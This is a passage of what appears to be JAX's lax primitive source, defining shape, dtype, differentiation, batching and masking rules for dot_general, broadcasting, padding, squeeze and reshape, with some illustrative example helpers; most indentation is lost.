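  # axes: transpose to (2, 7, 3, 5), then merge 7 * 3 into 21, with the folded
  # axis as the major factor of the merged dimension.
  assert np.transpose(y, (1, 0, 2, 3)).reshape(2, 21, 5).shape == (2, 21, 5)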
def _precision_config(precision):
if precision is not None:
config = xla_client.PrecisionConfig()
if isinstance(precision, tuple):
config.operand_precision.extend(precision)
else:
config.operand_precision.extend((precision, precision))
return config
return None
def _dot_general_shape_rule(lhs, rhs, *, dimension_numbers, precision,
preferred_element_type: Optional[DType]):
(lhs_contracting, rhs_contracting), (lhs_batch, rhs_batch) = dimension_numbers
if not all(np.all(np.greater_equal(d, 0)) and np.all(np.less(d, lhs.ndim))
for d in (lhs_contracting, lhs_batch)):
msg = ("dot_general requires lhs dimension numbers to be nonnegative and "
"less than the number of axes of the lhs value, got "
f"lhs_batch of {lhs_batch} and lhs_contracting of {lhs_contracting} "
f"for lhs of rank {lhs.ndim}")
raise TypeError(msg)
if not all(np.all(np.greater_equal(d, 0)) and np.all(np.less(d, rhs.ndim))
for d in (rhs_contracting, rhs_batch)):
msg = ("dot_general requires rhs dimension numbers to be nonnegative and "
"less than the number of axes of the rhs value, got "
f"rhs_batch of {rhs_batch} and rhs_contracting of {rhs_contracting} "
f"for rhs of rank {rhs.ndim}")
raise TypeError(msg)
if len(lhs_batch) != len(rhs_batch):
msg = ("dot_general requires equal numbers of lhs_batch and rhs_batch "
"dimensions, got lhs_batch {} and rhs_batch {}.")
raise TypeError(msg.format(lhs_batch, rhs_batch))
lhs_contracting_set, lhs_batch_set = set(lhs_contracting), set(lhs_batch)
rhs_contracting_set, rhs_batch_set = set(rhs_contracting), set(rhs_batch)
if len(lhs_batch_set) != len(lhs_batch):
msg = ("dot_general requires lhs batch dimensions to be distinct, got "
f"lhs_batch {lhs_batch}.")
raise TypeError(msg)
if len(rhs_batch_set) != len(rhs_batch):
msg = ("dot_general requires rhs batch dimensions to be distinct, got "
f"rhs_batch {rhs_batch}.")
raise TypeError(msg)
if len(lhs_contracting_set) != len(lhs_contracting):
msg = ("dot_general requires lhs contracting dimensions to be distinct, "
f"got lhs_contracting {lhs_contracting}.")
raise TypeError(msg)
if len(rhs_contracting_set) != len(rhs_contracting):
msg = ("dot_general requires rhs contracting dimensions to be distinct, "
f"got rhs_contracting {rhs_contracting}.")
raise TypeError(msg)
if lhs_contracting_set & lhs_batch_set:
msg = ("dot_general requires lhs batch dimensions to be disjoint from "
"contracting dimensions, got lhs_batch {} and lhs_contracting {}.")
raise TypeError(msg.format(lhs_batch, lhs_contracting))
if rhs_contracting_set & rhs_batch_set:
msg = ("dot_general requires rhs batch dimensions to be disjoint from "
"contracting dimensions, got rhs_batch {} and rhs_contracting {}.")
raise TypeError(msg.format(rhs_batch, rhs_contracting))
lhs_batch_shape = np.take(lhs.shape, lhs_batch)
rhs_batch_shape = np.take(rhs.shape, rhs_batch)
if not np.all(np.equal(lhs_batch_shape, rhs_batch_shape)):
msg = ("dot_general requires lhs batch dimensions and rhs batch dimensions "
"to have the same shape, got {} and {}.")
raise TypeError(msg.format(lhs_batch_shape, rhs_batch_shape))
lhs_contracting_shape = np.take(lhs.shape, lhs_contracting)
rhs_contracting_shape = np.take(rhs.shape, rhs_contracting)
if not np.all(np.equal(lhs_contracting_shape, rhs_contracting_shape)):
msg = ("dot_general requires contracting dimensions to have the same "
"shape, got {} and {}.")
raise TypeError(msg.format(lhs_contracting_shape, rhs_contracting_shape))
batch_shape = tuple(lhs_batch_shape)
lhs_contract_or_batch = tuple(sorted(tuple(lhs_contracting) + tuple(lhs_batch)))
lhs_tensored_shape = tuple(np.delete(lhs.shape, lhs_contract_or_batch))
rhs_contract_or_batch = tuple(sorted(tuple(rhs_contracting) + tuple(rhs_batch)))
rhs_tensored_shape = tuple(np.delete(rhs.shape, rhs_contract_or_batch))
return batch_shape + lhs_tensored_shape + rhs_tensored_shape
def _dot_general_dtype_rule(lhs, rhs, *, dimension_numbers, precision,
preferred_element_type: Optional[DType]):
input_dtype = naryop_dtype_rule(_input_dtype, [_any, _any], 'dot_general', lhs, rhs)
if preferred_element_type is None:
return input_dtype
if dtypes.issubdtype(input_dtype, np.integer) and not dtypes.issubdtype(preferred_element_type, np.integer):
raise TypeError("`preferred_element_type` and the original type must both be integral or both be floating point.")
if dtypes.issubdtype(input_dtype, np.signedinteger) and not dtypes.issubdtype(preferred_element_type, np.signedinteger):
raise TypeError("`preferred_element_type` must have the same signedness as the original type.")
input_bitwidth = np.dtype(input_dtype).itemsize
preferred_bitwidth = np.dtype(preferred_element_type).itemsize
if preferred_bitwidth < input_bitwidth:
raise TypeError("`preferred_element_type` must not be narrower than the original type.")
return preferred_element_type
def _dot_general_transpose_lhs(g, y, *, dimension_numbers, precision,
preferred_element_type: Optional[DType],
swap_ans=False):
(x_contract, y_contract), (x_batch, y_batch) = dimension_numbers
x_ndim = g.ndim - y.ndim + len(x_batch) + 2 * len(x_contract)
x_kept = remaining(range(x_ndim), x_contract, x_batch)
y_kept = remaining(range(y.ndim), y_contract, y_batch)
if swap_ans:
ans_batch, ans_y, _ = ranges_like(x_batch, y_kept, x_kept)
else:
ans_batch, _, ans_y = ranges_like(x_batch, x_kept, y_kept)
dims = ((ans_y, y_kept), (ans_batch, y_batch))
x_contract_sorted_by_y = list(np.take(x_contract, np.argsort(y_contract))) # type: ignore[arg-type]
out_axes = np.argsort(list(x_batch) + x_kept + x_contract_sorted_by_y)
return transpose(dot_general(g, y, dims, precision=precision, preferred_element_type=preferred_element_type),
tuple(out_axes))
def _dot_general_transpose_rhs(g, x, *, dimension_numbers, precision,
preferred_element_type: Optional[DType]):
(x_contract, y_contract), (x_batch, y_batch) = dimension_numbers
swapped_dimension_numbers = ((y_contract, x_contract), (y_batch, x_batch))
return _dot_general_transpose_lhs(
g, x, dimension_numbers=swapped_dimension_numbers, precision=precision,
preferred_element_type=preferred_element_type,
swap_ans=True)
def _dot_general_batch_rule(batched_args, batch_dims, *, dimension_numbers,
precision,
preferred_element_type: Optional[DType]):
lhs, rhs = batched_args
new_dimension_numbers, result_batch_dim = _dot_general_batch_dim_nums(
(lhs.ndim, rhs.ndim), batch_dims, dimension_numbers)
batched_out = dot_general(lhs, rhs, new_dimension_numbers,
precision=precision,
preferred_element_type=preferred_element_type)
return batched_out, result_batch_dim
def _dot_general_batch_dim_nums(ndims, batch_dims, dimension_numbers):
# there are three kinds of dimensions in a dot_general:
# - contraction dimensions appear in lhs and rhs but not the result
# - batch dimensions appear in lhs, rhs, and result
# - tensor product dimensions appear in the result and one of lhs or rhs
lhs_ndim, rhs_ndim = ndims
lbd, rbd = batch_dims
assert lbd is not None or rbd is not None
(lhs_contract, rhs_contract), (lhs_batch, rhs_batch) = dimension_numbers
def bump_dims(dims, b):
return tuple(np.add(dims, np.greater_equal(dims, b)))
if lbd is not None and rbd is not None:
# adding a batch dimension
lhs_batch = (lbd,) + bump_dims(lhs_batch, lbd)
rhs_batch = (rbd,) + bump_dims(rhs_batch, rbd)
lhs_contract = bump_dims(lhs_contract, lbd)
rhs_contract = bump_dims(rhs_contract, rbd)
result_batch_dim = 0
else:
# adding a tensor product dimension
if lbd is not None:
other = tuple(d for d in range(lhs_ndim)
if d not in lhs_batch and d not in lhs_contract)
result_batch_dim = (len(lhs_batch) + sum(np.less(other, lbd)))
lhs_batch = bump_dims(lhs_batch, lbd)
lhs_contract = bump_dims(lhs_contract, lbd)
else:
other = tuple(d for d in range(rhs_ndim)
if d not in rhs_batch and d not in rhs_contract)
result_batch_dim = (lhs_ndim - len(lhs_contract) +
sum(np.less(other, rbd)))
rhs_batch = bump_dims(rhs_batch, rbd)
rhs_contract = bump_dims(rhs_contract, rbd)
new_dimension_numbers = ((lhs_contract, rhs_contract), (lhs_batch, rhs_batch))
return new_dimension_numbers, int(result_batch_dim)
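# Illustrative sketch (not part of the library): the three kinds of dimensions
# in a concrete dot_general. For a batched matmul with lhs of shape (B, M, K)
# and rhs of shape (B, K, N), axis 0 of each operand is a batch dimension, the
# K axes are contracting dimensions, and M and N are tensor product dimensions
# that appear only in the (B, M, N) result. A hypothetical wrapper:
def _example_batched_matmul(lhs, rhs):
  # ((lhs_contracting, rhs_contracting), (lhs_batch, rhs_batch))
  dimension_numbers = (((2,), (1,)), ((0,), (0,)))
  return dot_general(lhs, rhs, dimension_numbers)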
def _dot_using_sum_of_products(lhs, rhs, *, dimension_numbers):
contract_dims, batch_dims = dimension_numbers
lhs_contract_dims, rhs_contract_dims = contract_dims
lhs_batch_dims, rhs_batch_dims = batch_dims
lhs_noncontract_dims = tuple(sorted(
set(range(np.ndim(lhs))) - set(lhs_batch_dims) - set(lhs_contract_dims)))
rhs_noncontract_dims = tuple(sorted(
set(range(np.ndim(rhs))) - set(rhs_batch_dims) - set(rhs_contract_dims)))
lhs = transpose(lhs,
lhs_batch_dims + lhs_noncontract_dims + lhs_contract_dims)
rhs = transpose(rhs,
rhs_batch_dims + rhs_noncontract_dims + rhs_contract_dims)
lhs_start_expand = len(lhs_batch_dims) + len(lhs_noncontract_dims)
lhs_end_expand = lhs_start_expand + len(rhs_noncontract_dims)
lhs = expand_dims(lhs, tuple(range(lhs_start_expand, lhs_end_expand)))
rhs_start_expand = len(lhs_batch_dims)
rhs_end_expand = rhs_start_expand + len(lhs_noncontract_dims)
rhs = expand_dims(rhs, tuple(range(rhs_start_expand, rhs_end_expand)))
out_ndim = (len(lhs_batch_dims) + len(lhs_noncontract_dims) +
len(rhs_noncontract_dims))
op_product = bitwise_and if lhs.dtype == np.bool_ else mul
op_sum = bitwise_or if lhs.dtype == np.bool_ else add
return reduce(op_product(lhs, rhs), _zero(lhs), op_sum,
tuple(range(out_ndim, out_ndim + len(lhs_contract_dims))))
def _dot_general_translation_rule(c, lhs, rhs, *, dimension_numbers, precision,
preferred_element_type: Optional[DType]):
if preferred_element_type is not None:
preferred_element_type = xla_client.dtype_to_etype(preferred_element_type)
return xops.DotGeneral(lhs, rhs,
xc.make_dot_dimension_numbers(dimension_numbers),
precision_config=_precision_config(precision),
preferred_element_type=preferred_element_type)
def _dot_general_masking_rule(padded_vals, logical_shapes, *, dimension_numbers,
precision,
preferred_element_type: Optional[DType]):
lhs, rhs = padded_vals
# Only need to mask off contraction dims of one side - we mask the lhs here
# but this is arbitrary. Could check the sizes of lhs and rhs and mask
# whichever is smallest.
lhs_shape, _ = logical_shapes
(lhs_contract, _), _ = dimension_numbers
return dot_general(_masked(lhs, lhs_shape, lhs_contract),
rhs, dimension_numbers, precision=precision,
preferred_element_type=preferred_element_type)
dot_general_p = standard_primitive(_dot_general_shape_rule,
_dot_general_dtype_rule, 'dot_general',
_dot_general_translation_rule)
ad.defbilinear(dot_general_p,
_dot_general_transpose_lhs, _dot_general_transpose_rhs)
batching.primitive_batchers[dot_general_p] = _dot_general_batch_rule
masking.masking_rules[dot_general_p] = _dot_general_masking_rule
def _broadcast_shape_rule(operand, sizes):
_check_shapelike('broadcast', 'sizes', sizes)
return tuple(sizes) + operand.shape
def _broadcast_batch_rule(batched_args, batch_dims, *, sizes):
operand, = batched_args
bdim, = batch_dims
new_bdim = None if bdim is None else bdim + len(sizes)
return broadcast(operand, sizes), new_bdim
broadcast_p = standard_primitive(
_broadcast_shape_rule, _input_dtype, 'broadcast')
ad.deflinear2(broadcast_p, lambda t, _, sizes: [_reduce_sum(t, range(len(sizes)))])
batching.primitive_batchers[broadcast_p] = _broadcast_batch_rule
def _broadcast_in_dim_impl(operand, *, shape, broadcast_dimensions):
if type(operand) is np.ndarray:
operand = _device_put_raw(operand)
if xla.type_is_device_array(operand) and np.all(
np.equal(operand.shape, np.take(shape, broadcast_dimensions))):
shape = _broadcast_in_dim_shape_rule(
operand, shape=shape, broadcast_dimensions=broadcast_dimensions)
aval = ShapedArray(shape, _dtype(operand), weak_type=dtypes.is_weakly_typed(operand))
if operand._lazy_expr is None:
lazy_expr = lazy.broadcast(lazy.array(operand.shape), shape, broadcast_dimensions)
else:
lazy_expr = lazy.broadcast(operand._lazy_expr, shape, broadcast_dimensions)
return xla._DeviceArray(aval, operand._device, lazy_expr, operand.device_buffer)
else:
return xla.apply_primitive(broadcast_in_dim_p, operand, shape=shape,
broadcast_dimensions=broadcast_dimensions)
def _broadcast_in_dim_shape_rule(operand, *, shape, broadcast_dimensions):
_check_shapelike('broadcast_in_dim', 'shape', shape)
_check_shapelike('broadcast_in_dim', 'broadcast_dimensions',
broadcast_dimensions)
operand_ndim = np.ndim(operand)
if operand_ndim != len(broadcast_dimensions):
msg = ('broadcast_in_dim broadcast_dimensions must have length equal to '
'operand ndim; got broadcast_dimensions {} for operand ndim {}.')
raise TypeError(msg.format(broadcast_dimensions, operand_ndim))
if len(shape) < operand_ndim:
msg = ('broadcast_in_dim target broadcast shape must have rank greater than or '
'equal to the operand rank; got operand ndim {} and target broadcast ndim {}.')
raise TypeError(msg.format(operand_ndim, len(shape)))
if not set(broadcast_dimensions).issubset(set(range(len(shape)))):
msg = ('broadcast_in_dim broadcast_dimensions must be a subset of output '
'dimensions, got {} for operand ndim {} and shape {}.')
raise TypeError(msg.format(broadcast_dimensions, operand_ndim, shape))
if any(operand.shape[i] != shape[broadcast_dimensions[i]] and
operand.shape[i] != 1 for i in range(operand_ndim)):
msg = (
"broadcast_in_dim operand dimension sizes must either be 1, or be "
"equal to their corresponding dimensions in the target broadcast "
"shape; got operand of shape {}, target broadcast shape {}, "
"broadcast_dimensions {} ")
raise TypeError(msg.format(operand.shape, shape, broadcast_dimensions))
if (len(broadcast_dimensions) != len(set(broadcast_dimensions)) or
tuple(broadcast_dimensions) != tuple(sorted(broadcast_dimensions))):
msg = ("broadcast_in_dim broadcast_dimensions must be strictly increasing; "
"got broadcast_dimensions {}")
raise TypeError(msg.format(broadcast_dimensions))
return shape
def _broadcast_in_dim_transpose_rule(ct, operand, *, shape, broadcast_dimensions):
shape_in = operand.aval.shape
unit_dimensions = tuple(i for i, s in enumerate(shape_in) if s == 1)
bdims = tuple(np.delete(broadcast_dimensions, unit_dimensions))
axes = tuple(np.delete(range(len(shape)), bdims))
return [expand_dims(_reduce_sum(ct, axes), unit_dimensions)]
def _broadcast_in_dim_batch_rule(batched_args, batch_dims, *, shape,
broadcast_dimensions):
operand, = batched_args
bdim, = batch_dims
new_operand = batching.moveaxis(operand, bdim, 0)
new_shape = (operand.shape[bdim],) + shape
new_broadcast_dimensions = (0,) + tuple(np.add(1, broadcast_dimensions))
return broadcast_in_dim(new_operand, new_shape, new_broadcast_dimensions), 0
broadcast_in_dim_p = standard_primitive(
_broadcast_in_dim_shape_rule, _input_dtype, 'broadcast_in_dim')
broadcast_in_dim_p.def_impl(_broadcast_in_dim_impl)
ad.deflinear2(broadcast_in_dim_p, _broadcast_in_dim_transpose_rule)
batching.primitive_batchers[broadcast_in_dim_p] = _broadcast_in_dim_batch_rule
def _clamp_shape_rule(min, operand, max):
if min.shape and min.shape != operand.shape:
m = "clamp requires min.shape == operand.shape or min.shape == (), got {}."
raise TypeError(m.format(min.shape))
if max.shape and max.shape != operand.shape:
m = "clamp requires max.shape == operand.shape or max.shape == (), got {}."
raise TypeError(m.format(max.shape))
return operand.shape
_clamp_dtype_rule = partial(naryop_dtype_rule, _input_dtype, [_any, _any, _any],
'clamp')
clamp_p = standard_primitive(_clamp_shape_rule, _clamp_dtype_rule, 'clamp')
ad.defjvp(clamp_p,
lambda g, min, operand, max:
select(bitwise_and(gt(min, operand), lt(min, max)),
_brcast(g, operand), _zeros(operand)),
lambda g, min, operand, max:
select(bitwise_and(gt(operand, min), lt(operand, max)),
g, _zeros(operand)),
lambda g, min, operand, max:
select(lt(max, operand), _brcast(g, operand), _zeros(operand)))
batching.defbroadcasting(clamp_p)
def _concatenate_shape_rule(*operands, **kwargs):
dimension = kwargs.pop('dimension')
if not operands:
msg = "concatenate expects at least one operand, got 0."
raise TypeError(msg)
if not all(isinstance(operand, UnshapedArray) for operand in operands):
msg = "All objects to concatenate must be arrays, got {}."
op = next(op for op in operands if not isinstance(op, UnshapedArray))
raise TypeError(msg.format(type(op)))
if len({operand.ndim for operand in operands}) != 1:
msg = "Cannot concatenate arrays with different ranks, got {}."
raise TypeError(msg.format(", ".join(str(o.ndim) for o in operands)))
if not 0 <= dimension < operands[0].ndim:
msg = "concatenate dimension out of bounds: dimension {} for shapes {}."
raise TypeError(msg.format(dimension, ", ".join([str(o.shape) for o in operands])))
shapes = [operand.shape[:dimension] + operand.shape[dimension+1:]
for operand in operands]
if shapes[:-1] != shapes[1:]:
msg = ("Cannot concatenate arrays with shapes that differ in dimensions "
"other than the one being concatenated: concatenating along "
"dimension {} for shapes {}.")
shapes = [operand.shape for operand in operands]
raise TypeError(msg.format(dimension, ", ".join(map(str, shapes))))
concat_size = sum(o.shape[dimension] for o in operands)
ex_shape = operands[0].shape
return ex_shape[:dimension] + (concat_size,) + ex_shape[dimension+1:]
def _concatenate_dtype_rule(*operands, **kwargs):
_check_same_dtypes('concatenate', False, *(o.dtype for o in operands))
return operands[0].dtype
def _concatenate_translation_rule(c, *operands, **kwargs):
dimension = kwargs.pop('dimension')
return xops.ConcatInDim(c, operands, dimension)
def _concatenate_transpose_rule(t, *operands, dimension):
operand_shapes = [o.aval.shape if ad.is_undefined_primal(o) else o.shape
for o in operands]
if type(t) is ad_util.Zero:
return [ad_util.Zero(o.aval) if ad.is_undefined_primal(o) else None
for o in operands]
else:
limit_points = np.cumsum([shape[dimension] for shape in operand_shapes])
starts = np.zeros((len(operands), t.ndim), dtype=int)
starts[1:, dimension] = limit_points[:-1]
limits = np.tile(t.shape, (len(operands), 1))
limits[:, dimension] = limit_points
return [slice(t, start, limit) if ad.is_undefined_primal(o) else None
for o, start, limit in zip(operands, starts, limits)]
def _concatenate_batch_rule(batched_args, batch_dims, *, dimension):
size = next(op.shape[bdim] for op, bdim in zip(batched_args, batch_dims)
if bdim is not None)
operands = [batching.moveaxis(op, bdim, 0) if bdim is not None
else broadcast(op, (size,))
for op, bdim in zip(batched_args, batch_dims)]
return concatenate(operands, dimension + 1), 0
# The concatenate_p masking rule requires use of a while-loop construct and so
# is defined in lax_control_flow.py
concatenate_p = standard_primitive(
_concatenate_shape_rule, _concatenate_dtype_rule, 'concatenate',
_concatenate_translation_rule)
ad.deflinear2(concatenate_p, _concatenate_transpose_rule)
ad.primitive_transposes[concatenate_p] = _concatenate_transpose_rule
batching.primitive_batchers[concatenate_p] = _concatenate_batch_rule
def _pad_dtype_rule(operand, padding_value, *, padding_config):
if operand.dtype != padding_value.dtype:
msg = "pad operand and padding_value must be same dtype: got {} and {}."
raise TypeError(msg.format(operand.dtype, padding_value.dtype))
return _input_dtype(operand, padding_value)
def _pad_shape_rule(operand, padding_value, *, padding_config):
del padding_value
if len(padding_config) != np.ndim(operand):
raise ValueError("length of padding_config must equal the number of axes "
f"of operand, got padding_config {padding_config} "
f"for operand shape {np.shape(operand)}")
if not all(i >= 0 for _, _, i in padding_config):
raise ValueError("interior padding in padding_config must be nonnegative, "
f"got padding_config {padding_config}")
return tuple(l + h + d + (_max(0, d - 1) * i if i > 0 else 0)
for (l, h, i), d in zip(padding_config, np.shape(operand)))
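# Illustrative sketch (not part of the library): the padded-size formula above
# for one hypothetical axis. With d = 4 and padding_config entry
# (lo, hi, interior) = (1, 2, 3), three interior elements are inserted between
# each adjacent pair of the four originals, so the output size is
# 1 + 2 + 4 + max(0, 4 - 1) * 3 == 16.
def _example_pad_output_size(d=4, lo=1, hi=2, interior=3):
  return lo + hi + d + max(0, d - 1) * interior   # -> 16 for the defaults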
def _pad_transpose(t, operand, padding_value, *, padding_config):
if type(t) is ad_util.Zero:
t_operand = ad_util.Zero(operand.aval) if ad.is_undefined_primal(operand) else None
t_padv = ad_util.Zero(padding_value.aval) if ad.is_undefined_primal(padding_value) else None
else:
lo, hi, interior = zip(*padding_config)
total = lambda x: _reduce_sum(x, list(range(t.ndim)))
def t_op():
unpad_config = safe_zip(np.negative(lo), np.negative(hi),
np.zeros_like(interior))
unpadded = pad(t, np.array(0., t.dtype), unpad_config)
return slice(unpadded, np.zeros_like(lo), unpadded.shape, np.add(interior, 1))
t_operand = t_op() if ad.is_undefined_primal(operand) else None
t_padv = sub(total(t), total(t_operand)) if ad.is_undefined_primal(padding_value) else None
return [t_operand, t_padv]
def _pad_batch_rule(batched_args, batch_dims, *, padding_config):
operand, padding_value = batched_args
operand_bdim, padding_value_bdim = batch_dims
if padding_value_bdim is None:
assert operand_bdim is not None
padding_config = list(padding_config)
padding_config.insert(operand_bdim, (0, 0, 0))
return pad(operand, padding_value, padding_config), operand_bdim
else:
raise NotImplementedError # loop and stack
def _pad_translation_rule(c, operand, padding_value, *, padding_config):
return xops.Pad(operand, padding_value,
xc.make_padding_config(padding_config))
def _pad_masking_rule(padded_vals, logical_shapes, padding_config):
operand, padding_value = padded_vals
shape, _ = logical_shapes
out = pad(operand, padding_value, padding_config)
out_shape = [lo + shape[i] * (interior + 1)
for i, (lo, hi, interior) in enumerate(padding_config)]
padded_dims = [i for i, config in enumerate(padding_config)
if config != (0, 0, 0)]
return _masked(out, out_shape, padded_dims, padding_value)
pad_p = standard_primitive(_pad_shape_rule, _pad_dtype_rule, 'pad',
translation_rule=_pad_translation_rule)
ad.deflinear2(pad_p, _pad_transpose)
batching.primitive_batchers[pad_p] = _pad_batch_rule
masking.masking_rules[pad_p] = _pad_masking_rule
# The squeeze primitive exists for the benefit of masking and other
# transformations that need to keep track of axis identity.
# For example, consider reshaping a 2D array with shape (1, N) into a 1D array
# with shape (N,). This results in the following JAXpr:
# reshape[ dimension=None new_sizes=(N,) ]
# For N > 1, we can match up the output array axis with the second axis of the
# input. But for N = 1, it is not clear how axes match up: all we know from the
# JAXpr is that we are reshaping from (1, 1) to (1,).
# In contrast, squeeze[ dimensions=(0,) ] is unambiguous.
def squeeze(array: Array, dimensions: Tuple[int, ...]) -> Array:
"""Squeeze any number of size 1 dimensions from an array."""
ndim = np.ndim(array)
dimensions = tuple(sorted(canonicalize_axis(i, ndim) for i in dimensions))
if not dimensions:
return array
return squeeze_p.bind(array, dimensions=dimensions)
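# Illustrative sketch (not part of the library): why squeeze preserves axis
# identity where reshape cannot. For a hypothetical array of shape (1, 3) both
# calls produce shape (3,), but squeeze records which axis was dropped, which is
# what masking and batching transformations need to track.
def _example_squeeze_vs_reshape(x):
  # x is assumed to have shape (1, 3).
  a = reshape(x, (3,))             # jaxpr only records the new sizes
  b = squeeze(x, dimensions=(0,))  # jaxpr records the dropped axis explicitly
  return a, b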
def _squeeze_dtype_rule(operand, *, dimensions):
return operand.dtype
def _squeeze_shape_rule(operand, *, dimensions):
return _compute_squeeze_shape(np.shape(operand), dimensions)
def _compute_squeeze_shape(shape, dimensions):
dims_set = set(dimensions)
if len(dims_set) != len(dimensions):
raise ValueError(f"dimensions are not unique: {dimensions}")
if not all(0 <= d < len(shape) for d in dims_set):
raise ValueError(f"dimensions outside range [0, ndim): {dimensions}")
if any(shape[d] != 1 for d in dimensions):
raise ValueError(
"cannot select an axis to squeeze out which has size not equal to "
f"one, got shape={shape} and dimensions={dimensions}")
return tuple(s for i, s in enumerate(shape) if i not in dims_set)
def _squeeze_translation_rule(c, arg, *, dimensions):
new_shape = _compute_squeeze_shape(c.get_shape(arg).dimensions(), dimensions)
return xops.Reshape(arg, new_shape)
def _squeeze_transpose_rule(t, operand, *, dimensions):
assert ad.is_undefined_primal(operand)
return [expand_dims(t, dimensions)]
def _squeeze_batch_rule(batched_args, batch_dims, *, dimensions):
operand, = batched_args
bdim, = batch_dims
operand = batching.moveaxis(operand, bdim, 0)
dimensions = tuple(np.add(1, dimensions))
return squeeze(operand, dimensions=dimensions), 0
squeeze_p = standard_primitive(_squeeze_shape_rule, _squeeze_dtype_rule,
'squeeze', _squeeze_translation_rule)
ad.deflinear2(squeeze_p, _squeeze_transpose_rule)
batching.primitive_batchers[squeeze_p] = _squeeze_batch_rule
def expand_dims(array: Array, dimensions: Tuple[int, ...]) -> Array:
"""Insert any number of size 1 dimensions into an array."""
ndim_out = np.ndim(array) + len(dimensions)
dims_set = frozenset(canonicalize_axis(i, ndim_out) for i in dimensions)
result_shape = list(np.shape(array))
for i in sorted(dims_set):
result_shape.insert(i, 1)
broadcast_dims = [i for i in range(ndim_out) if i not in dims_set]
return broadcast_in_dim(array, result_shape, broadcast_dims)
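# Worked example (illustrative only): expand_dims on an array of shape (3,)
# with dimensions=(0, 2) computes ndim_out = 3, dims_set = {0, 2},
# result_shape = [1, 3, 1] and broadcast_dims = [1], so the original axis is
# placed at output position 1 via broadcast_in_dim.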
# We have a nonstandard reshape impl so that we can be lazy about data movement.
def _reshape_impl(operand, *, new_sizes, dimensions):
old_sizes = np.shape(operand)
if xla.type_is_device_array(operand) and dimensions is None:
bcast_dims = _is_singleton_reshape(old_sizes, new_sizes)
if bcast_dims is not None:
aval = ShapedArray(new_sizes, operand.dtype)
if operand._lazy_expr is None:
lazy_expr = lazy.broadcast(lazy.array(operand.shape), new_sizes, bcast_dims)
else:
lazy_expr = lazy.broadcast(operand._lazy_expr, new_sizes, bcast_dims)
return xla._DeviceArray(aval, operand._device, lazy_expr, operand.device_buffer)
return xla.apply_primitive(reshape_p, operand, new_sizes=new_sizes,
dimensions=dimensions)
def _is_singleton_reshape(old, new):
# A singleton reshape is one where only singleton dimensions are added. We
# want to detect them because they can be expressed as (lazy) broadcasts.
old, new = iter(old), iter(new)
d1, d2 = next(old, None), next(new, None)
bcast_dims = []
i = 0
while True:
if d1 is d2 is None:
return bcast_dims
elif d1 == d2:
bcast_dims.append(i)
i += 1
d1, d2 = next(old, None), next(new, None)
elif d2 == 1:
i += 1
d2 = next(new, None)
else:
return None
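# Worked example (illustrative only):
#   _is_singleton_reshape((3, 4), (3, 1, 4, 1)) returns [0, 2], since only
#   size-1 axes are inserted and the reshape is expressible as a broadcast of
#   the original axes into output positions 0 and 2.
#   _is_singleton_reshape((3, 4), (4, 3)) returns None, since that reshape is
#   not a pure insertion of singleton dimensions.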
def _reshape_shape_rule(operand, *, new_sizes, dimensions):
if not np.all(np.greater_equal(new_sizes, 0)):
    msg = 'reshape new_sizes must all be nonnegative, got {}.'
raise TypeError(msg.format(new_sizes))
if prod(np.shape(operand)) != prod(new_sizes):
msg = 'reshape total size must be unchanged, got new_sizes {} for shape {}.'
raise TypeError(msg.format(new_sizes, np.shape(operand)))
if dimensions is not None:
if set(dimensions) != set(range(np.ndim(operand))):
msg = ('reshape dimensions must be a permutation of operand dimensions, '
'got dimensions {} for shape {}.')
raise TypeError(msg.format(dimensions, np.shape(operand)))
return tuple(new_sizes)
def _reshape_dtype_rule(operand, *, new_sizes, dimensions):
return operand.dtype
def _reshape_translation_rule(c, operand, *, new_sizes, dimensions):
if dimensions is None:
return xops.Reshape(operand, new_sizes)
else:
return xops.Reshape(operand, dimensions, new_sizes)
def _reshape_transpose_rule(t, operand, *, new_sizes, dimensions):
assert ad.is_undefined_primal(operand)
if dimensions is None:
return [reshape(t, operand.aval.shape)]
else:
return [transpose(reshape(t, np.take(operand.aval.shape, dimensions)),
np.argsort(dimensions))]
def _reshape_batch_rule(batched_args, batch_dims, *, new_sizes, dimensions):
operand, = batched_args
bdim, = batch_dims
operand = batching.moveaxis(operand, bdim, 0)
if dimensions is not None:
dimensions = (0,) + tuple(np.add(1, dimensions))
return reshape(operand, operand.shape[:1] + new_sizes, dimensions), 0
def _reshape_masking_rule(padded_args, logical_shapes, polymorphic_shapes,
new_sizes, dimensions):
operand, = padded_args
old_shape, = polymorphic_shapes
def is_poly(size): return type(size) is masking.Poly and not size.is_constant
def merge_const_sizes(shape):
"""Merges all nonpolymorphic sizes into the previous polymorphic size."""
poly_dims = [i for i, size in enumerate(shape) if is_poly(size)]
return [prod(shape[start:stop])
for start, stop in zip([0] + poly_dims, poly_dims + [len(shape)])]
if merge_const_sizes(old_shape) != merge_const_sizes(new_sizes):
raise NotImplementedError(
"Reshape on padded dimensions causing fragmentation is not supported.")
return reshape(operand,
new_sizes=masking.padded_shape_as_value(new_sizes),
dimensions=dimensions)
reshape_p = standard_primitive(_reshape_shape_rule, _reshape_dtype_rule,
'reshape', _reshape_translation_rule)
reshape_p.def_impl(_reshape_impl)
ad.deflinear2(reshape_p, _reshape_transpose_rule)
batching.primitive_batchers[reshape_p] = _reshape_batch_rule
masking.masking_rules[reshape_p] = _reshape_masking_rule
def _rev_shape_rule(operand, *, dimensions):
_check_shapelike('rev', 'dimensions', dimensions)
if len(set(dimensions)) != len(dimensions):
msg = 'rev dimensions must be unique, got {}.'
raise TypeError(msg.format(dimensions))
if dimensions and not _max(dimensions) < operand.ndim:
msg = ('rev dimensions must all be less than operand ndim, got dimensions '
'{} for operand ndim {}.')
raise TypeError(msg.format(dimensions, operand.ndim))
return operand.shape
def _rev_batch_rule(batched_args, batch_dims, *, dimensions):
operand, = batched_args
bdim, = batch_dims
new_dimensions = [i + 1 if i >= bdim else i for i in dimensions]
return rev(operand, new_dimensions), bdim
rev_p = standard_primitive(_rev_shape_rule, _input_dtype, 'rev')
ad.deflinear2(rev_p, lambda t, _, dimensions: [rev(t, dimensions)])
batching.primitive_batchers[rev_p] = _rev_batch_rule
def _transpose_impl(operand, *, permutation):
if xla.type_is_device_array(operand):
if operand._lazy_expr is None:
lazy_expr = lazy.transpose(lazy.array(operand.shape), permutation)
else:
lazy_expr = lazy.transpose(operand._lazy_expr, permutation)
aval = ShapedArray(lazy_expr.shape, operand.dtype)
return xla._DeviceArray(aval, operand._device, lazy_expr, operand.device_buffer)
else:
return xla.apply_primitive(transpose_p, operand, permutation=permutation)
def _transpose_shape_rule(operand, *, permutation):
if not isinstance(permutation, (tuple, list, np.ndarray)):
msg = "transpose permutation must be a tuple/list/ndarray, got {}."
